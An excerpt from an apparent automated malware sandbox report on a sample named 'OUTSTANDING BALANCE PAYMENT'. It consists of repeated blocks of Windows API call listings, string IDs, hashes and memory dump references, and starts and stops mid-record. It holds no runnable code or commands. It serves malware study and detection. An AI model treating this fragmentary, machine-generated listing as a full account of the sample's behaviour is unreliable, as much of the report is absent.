                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: SendString
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 890592661-1007645807
                                                          • Opcode ID: 0329af34fbbd08dc4b8d9473959cda07139e61c878b6adde815b42c1c786d4f0
                                                          • Instruction ID: 35895733d4de2ca254adfce682c8eb21fb43b0e40f3883c87c57716e6657e654
                                                          • Opcode Fuzzy Hash: 0329af34fbbd08dc4b8d9473959cda07139e61c878b6adde815b42c1c786d4f0
                                                          • Instruction Fuzzy Hash: 1F11B2E1A842A979D720A361CC9ADFF7EFCEB93B14F4005A97411A60C1DEA00E85C6B0
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00BA7794
                                                            • Part of subcall function 00B7DC38: timeGetTime.WINMM(?,75A8B400,00BD58AB), ref: 00B7DC3C
                                                          • Sleep.KERNEL32(0000000A), ref: 00BA77C0
                                                          • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00BA77E4
                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00BA7806
                                                          • SetActiveWindow.USER32 ref: 00BA7825
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BA7833
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BA7852
                                                          • Sleep.KERNEL32(000000FA), ref: 00BA785D
                                                          • IsWindow.USER32 ref: 00BA7869
                                                          • EndDialog.USER32(00000000), ref: 00BA787A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 81bf572c0ed04a8256d791d69d7c608b9a5d07021a91c99bc16dd81d73d13018
                                                          • Instruction ID: da8d7e0391a6eeadd86f0bb48f05b70139838b553c429d3731470f36c2b8f769
                                                          • Opcode Fuzzy Hash: 81bf572c0ed04a8256d791d69d7c608b9a5d07021a91c99bc16dd81d73d13018
                                                          • Instruction Fuzzy Hash: 2421547025C685AFE7115B20ECCDB2A3FA9FB46349F0001A4F50696572CFBD5D02DB21
                                                          APIs
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • CoInitialize.OLE32(00000000), ref: 00BB034B
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BB03DE
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00BB03F2
                                                          • CoCreateInstance.OLE32(00BEDA8C,00000000,00000001,00C13CF8,?), ref: 00BB043E
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BB04AD
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00BB0505
                                                          • _memset.LIBCMT ref: 00BB0542
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00BB057E
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BB05A1
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00BB05A8
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BB05DF
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00BB05E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 889a6f00bee70ca9aa87999c896ea3be2cb0dfa35b67404095c929605a670194
                                                          • Instruction ID: 11efd104af43bd1528279da93717f3436ed896864b057b50ed37daf920ce9c89
                                                          • Opcode Fuzzy Hash: 889a6f00bee70ca9aa87999c896ea3be2cb0dfa35b67404095c929605a670194
                                                          • Instruction Fuzzy Hash: DAB1D875A10109AFDB14EFA4C898DAEBBF9FF48304B1484A9E806EB251DB74ED45CB50
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00BA2ED6
                                                          • SetKeyboardState.USER32(?), ref: 00BA2F41
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00BA2F61
                                                          • GetKeyState.USER32(000000A0), ref: 00BA2F78
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00BA2FA7
                                                          • GetKeyState.USER32(000000A1), ref: 00BA2FB8
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00BA2FE4
                                                          • GetKeyState.USER32(00000011), ref: 00BA2FF2
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00BA301B
                                                          • GetKeyState.USER32(00000012), ref: 00BA3029
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00BA3052
                                                          • GetKeyState.USER32(0000005B), ref: 00BA3060
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 231d8d431d4528cd64d44755f4ce96e65ecae44fb823cde1a58c5e711117f2dd
                                                          • Instruction ID: 41f57a99a2d6bb3db0fa6b1019a2ca55dd97ba214fc522ed1377d22fd2d91494
                                                          • Opcode Fuzzy Hash: 231d8d431d4528cd64d44755f4ce96e65ecae44fb823cde1a58c5e711117f2dd
                                                          • Instruction Fuzzy Hash: 3951C524A0C79429FB35DBA888517AABFF4DF13740F0885DDD5C25A1C2DB949B8CC7A2
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 00B9ED1E
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B9ED30
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B9ED8E
                                                          • GetDlgItem.USER32(?,00000002), ref: 00B9ED99
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B9EDAB
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B9EE01
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B9EE0F
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B9EE20
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B9EE63
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B9EE71
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B9EE8E
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B9EE9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 464101e47fff4ef0c9b00a49b1aa646c40eb7a251dfc1fe11a9399d2a013df17
                                                          • Instruction ID: efad0541b367543494da01a1f100a4ca007d3af5ec33c1a1447962871fd7ca92
                                                          • Opcode Fuzzy Hash: 464101e47fff4ef0c9b00a49b1aa646c40eb7a251dfc1fe11a9399d2a013df17
                                                          • Instruction Fuzzy Hash: DE51FE71B00605AFDF18CF69DD85AAEBBBAEB88701F148579F51AD7290DBB0DD008B10
                                                          APIs
                                                            • Part of subcall function 00B7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B7B759,?,00000000,?,?,?,?,00B7B72B,00000000,?), ref: 00B7BA58
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B7B72B), ref: 00B7B7F6
                                                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00B7B88D
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00BDD8A6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD8D7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD8EE
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD90A
                                                          • DeleteObject.GDI32(00000000), ref: 00BDD91C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: 715bd1022a551f9bcbfbf35992fd1389606d114a257f3ff190d6264c1666c55f
                                                          • Instruction ID: 018642da8d77d04aa1222df86bce216a19e86f3f6ca439d33952d259e2138fd7
                                                          • Opcode Fuzzy Hash: 715bd1022a551f9bcbfbf35992fd1389606d114a257f3ff190d6264c1666c55f
                                                          • Instruction Fuzzy Hash: 13619C30511600DFDB369F18D888B29B7F5FFA0311F1981AEE49A8BA60DB75AC81DF41
                                                          APIs
                                                            • Part of subcall function 00B7B526: GetWindowLongW.USER32(?,000000EB), ref: 00B7B537
                                                          • GetSysColor.USER32(0000000F), ref: 00B7B438
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 83500d309e5254f3460dc8925659821ceab803aa7c65dbe19974026267991373
                                                          • Instruction ID: ad294f42d1d7c74fea6b0222d2ebb820c5f2b5b83f8b081a44ef162b7f79be59
                                                          • Opcode Fuzzy Hash: 83500d309e5254f3460dc8925659821ceab803aa7c65dbe19974026267991373
                                                          • Instruction Fuzzy Hash: 79417F31100154AFDF205F28D889FB93BA6EB55721F1882A5FDB99F2E6DB708C41DB21
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                          • String ID:
                                                          • API String ID: 136442275-0
                                                          • Opcode ID: 59a312776b0d0559b984b1857b296518def4bbb94ae9298b2966477cb4a9d801
                                                          • Instruction ID: 0bd5a3006a1cbd208018b96f255ee140aa21145daae7b31443bbb769eb347bad
                                                          • Opcode Fuzzy Hash: 59a312776b0d0559b984b1857b296518def4bbb94ae9298b2966477cb4a9d801
                                                          • Instruction Fuzzy Hash: 2F41FAB784511CAECB65EB94CC86DDB73FCEB44300F0041E6BA59A2051EA70ABE9CF54
                                                          APIs
                                                          • CharLowerBuffW.USER32(00BFDC00,00BFDC00,00BFDC00), ref: 00BAD7CE
                                                          • GetDriveTypeW.KERNEL32(?,00C13A70,00000061), ref: 00BAD898
                                                          • _wcscpy.LIBCMT ref: 00BAD8C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: ee2025ec5fecb53667d942573368e223a24b7611bf6834638a74e2cee77abb0d
                                                          • Instruction ID: 6738aa15986e60e3b223dcf6e472af3e932308f0fe07a62a5cb32b265111b1ae
                                                          • Opcode Fuzzy Hash: ee2025ec5fecb53667d942573368e223a24b7611bf6834638a74e2cee77abb0d
                                                          • Instruction Fuzzy Hash: 9C51C6751083409FC700EF14C881AAFB7E9EF86314F1088ADF5AA576A2EB35DE05DB42
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00B693AB
                                                          • __itow.LIBCMT ref: 00B693DF
                                                            • Part of subcall function 00B81557: _xtow@16.LIBCMT ref: 00B81578
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf_xtow@16
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 1502193981-2263619337
                                                          • Opcode ID: 282aa7fd6c960c324918ec74bf9e5c7cde9cdcdb95ab10aa0682d327ff338d3a
                                                          • Instruction ID: beeb59fd7309666418f33ae8490876fb31584ec41c5bf103b06892daba456b28
                                                          • Opcode Fuzzy Hash: 282aa7fd6c960c324918ec74bf9e5c7cde9cdcdb95ab10aa0682d327ff338d3a
                                                          • Instruction Fuzzy Hash: 4141D472515205EBDB24EB78D982EBAB7E8EB44300F2444EBE14AD73D1EA35A941CB14
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BCA259
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00BCA260
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BCA273
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00BCA27B
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BCA286
                                                          • DeleteDC.GDI32(00000000), ref: 00BCA28F
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00BCA299
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BCA2AD
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BCA2B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 79c5e94b45579baf5811bf362b045cf3273c265db13b0616602f6168af1ab75a
                                                          • Instruction ID: b39bc410cff917f22ccfb84bc295baf8dd95bf9928111b1455afd6822a858bdb
                                                          • Opcode Fuzzy Hash: 79c5e94b45579baf5811bf362b045cf3273c265db13b0616602f6168af1ab75a
                                                          • Instruction Fuzzy Hash: DF319E31100118AFDF215FA4DC89FEA3BA9FF09364F100218FA19AA0E0CB75D811DBA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 2620052-3771769585
                                                          • Opcode ID: 3a77b42cf517ba95ae908da2a822e58ce44570cbd67d0e1c8585704855ea5ca2
                                                          • Instruction ID: 528d610983690e2e2299919977ea3e9cd2311680c2f4a403820ba0a22b799d0c
                                                          • Opcode Fuzzy Hash: 3a77b42cf517ba95ae908da2a822e58ce44570cbd67d0e1c8585704855ea5ca2
                                                          • Instruction Fuzzy Hash: BC11D2B2508115AFCB24BB60AC4AEDA77E8EF41710F0400E5F505AB091EEB1EE858B50
                                                          APIs
                                                          • _memset.LIBCMT ref: 00B85047
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          • __gmtime64_s.LIBCMT ref: 00B850E0
                                                          • __gmtime64_s.LIBCMT ref: 00B85116
                                                          • __gmtime64_s.LIBCMT ref: 00B85133
                                                          • __allrem.LIBCMT ref: 00B85189
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B851A5
                                                          • __allrem.LIBCMT ref: 00B851BC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B851DA
                                                          • __allrem.LIBCMT ref: 00B851F1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B8520F
                                                          • __invoke_watson.LIBCMT ref: 00B85280
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                          • Instruction ID: 4a81141b2ebc42801f879746eacd424d998f355e708d1da62ccd1773b9dfa3af
                                                          • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                          • Instruction Fuzzy Hash: 9D71C775A01B17ABDB24BE78CC81BAAB3E8EF04764F1442B9F510D6291EB70D940CBD0
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BA4DF8
                                                          • GetMenuItemInfoW.USER32(00C21708,000000FF,00000000,00000030), ref: 00BA4E59
                                                          • SetMenuItemInfoW.USER32(00C21708,00000004,00000000,00000030), ref: 00BA4E8F
                                                          • Sleep.KERNEL32(000001F4), ref: 00BA4EA1
                                                          • GetMenuItemCount.USER32(?), ref: 00BA4EE5
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00BA4F01
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00BA4F2B
                                                          • GetMenuItemID.USER32(?,?), ref: 00BA4F70
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BA4FB6
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4FCA
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4FEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 69623f3f74ca4d0fb6387835008533dd563773972815e21e92285069d49861e1
                                                          • Instruction ID: d68b35700fbf13a87b3d9f0cc95a3711ee5425419c7bbecaff93a2df79746ac9
                                                          • Opcode Fuzzy Hash: 69623f3f74ca4d0fb6387835008533dd563773972815e21e92285069d49861e1
                                                          • Instruction Fuzzy Hash: C361A271908289AFDF21CF68DC84EAE7BF8FB82304F140599F945A7251D7B2AD05CB21
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BC9C98
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BC9C9B
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BC9CBF
                                                          • _memset.LIBCMT ref: 00BC9CD0
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BC9CE2
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BC9D5A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
